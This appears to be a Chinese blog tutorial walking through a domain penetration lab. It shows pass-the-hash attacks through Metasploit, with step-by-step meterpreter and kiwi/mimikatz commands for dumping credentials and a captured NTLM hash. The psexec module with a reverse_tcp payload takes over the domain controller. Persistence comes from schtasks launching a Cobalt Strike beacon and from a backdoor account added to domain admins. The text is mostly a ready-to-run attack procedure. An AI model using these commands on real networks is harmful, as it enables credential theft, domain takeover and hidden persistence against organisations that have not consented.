域渗透-哈希传递攻击进阶二

首先我们在Kali里边开启MSF

之前我们的Windows7是由域管理员进行登录的

现在我们切换用户,切换成我们的普通账户

 运行这个木马程序,使其上线

 上线成功

正常情况下,如果我们要获取域控权限,首先得获取到域控的Hash

那么MSF里面如何获取Hash

1、使用kiwi模块

meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > getsystem 提权到SYSTEM权限(前提默认是本地管理员登录)
meterpreter > kiwi_cmd sekurlsa::logonpasswords

首先使用如下命令,加载mimikatz,默认情况下是没有加载的

load mimikatz

提示告诉我们mimikatz已经被kiwi取代

所以我们加载kiwi

load liwi

然后使用如下命令

creds_all

告诉我们需要用系统权限运行

所以我们使用如下命令进行提权

getsystem

提权成功,因为我们刚刚登录Windows7的用户是本地管理员,所以这是一个前提,否则无法提权完成

然后使用如下命令

hashdump

前面那一段数字是老版本的LM,微软为了兼容,并没有把LM拿掉,让这一段变成了无效,LM超过14个字符就是无效的,我们的NTLM是后面那一段数字

提权成功之后,我们再继续使用如下命令

creds_all

可以得到和logonpasswords(mimikatz)一样的东西

接下来呢,有了域控管理员的Hash以后,我们可以干嘛

我们先进入到shell里面去访问一下域控主机的C盘,发现访问被拒绝

然后我们使用exit退出来

运行如下命令,kili_cmd后面跟的就是mimikatz的命令

kiwi_cmd sekurlsa::pth /user:administrator /domain:192.168.112.100 /ntlm:beeabbdf97a07d8356dbb2bbf617e1ba

然后我们在熟悉一下其他的命令

kiwi_cmd sekurlsa::logonpasswords

我们使用bg命令,让木马程序在后台运行

2、使用psexec模块

use exploit/windows/smb/psexec
show options
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.219.144
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:beeabbdf97a07d8356dbb2bbf617e1ba
show options

然后run,这样就可以获得整个域控的meterpreter

然后使用sysinfo看看是否为域控主机,发现正确

shell进入Windows 2008的命令行,确认是否为Windows2008

然后exit返回到模块那里去

由于我们木马是32位的,我们的系统是64位的,所以不兼容,所以会给我们报错

为了解决这个问题,我们将payload设置成64位的即可

然后run,使用命令hashdump,给我们回显了用户和主机对应的Hash值

假设一个例子,如果RHOST设置成112.158,其他的参数信息不变,那我们就可以拿下112.168这台机器了,这样的话横向移动就完成了

接下来我们进入到Windows2008的shell,然后做一个权限的维持

我们该怎么维持呢?使用定时任务,每天执行一次,为了演示,我们将时间设置的快一点

为了更好的保持权限维持,也可以使用Windows的定时任务命令schtasks.exe创建定时运行的任务,如每天凌晨2点30分运行

SCHTASKS /Create /TN HTTPBeacon /TR C:\Tools\http_beacon.exe /SC DAILY /ST 02:30

更多关于schtasks命令的用法,参考https://blog.youkuaiyun.com/qq_39680564/article/details/88993633

参数的解释:
/Create 创建一个新的定时任务
/TN 给这个定时任务取一个名字
/TR 指定这个定时任务要运行的程序
/SC /ST 设置时间
该命令就是设置成每天的凌晨两点半

我们先去Windows2008上去看看有哪些定时任务,发现只有一个

 然后去执行我们上面的命令,发现执行成功

然后我们再去Windows2008上看看有没有添加进去,发现已经添加进去

我们再设置一个定时任务,因为上面那个木马程序已经没有了,我们用之前用过的http_beacon_64.exe,然后执行如下命令即可

SCHTASKS /Create /TN HTTPBeacon /TR C:\Tools\http_beacon_64.exe /SC DAILY /ST 16:43

发现添加成功

然后我们再CS界面那里等着WIndows2008域控主机上线,上线成功

我们还可以使用impacket工具包的psexec.exe脚本进行利用,这里显示通过hash的方式认证

(存放的位置:impacket-master\examples)

运行命令之后会得到一个命令行

使用wmic进行横向移动

我们还可以使用创建用户的方式

使用如下命令创建一个用户,由于我们本来就在Windows2008的本机,所以不需要加/domain,直接创建就是本机账号

如果想要在WIndows7上创建域用户的话,直接加/domain就行

net user wangwu User789 /add

普通的wangwu域用户创建成功

我们给其加一个域管理员的权限,使用如下命令

net group "domain admins" wangwu /add

 然后再去查看,发现wangwu已经隶属于domain admins

以上操作是为了权限维持

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值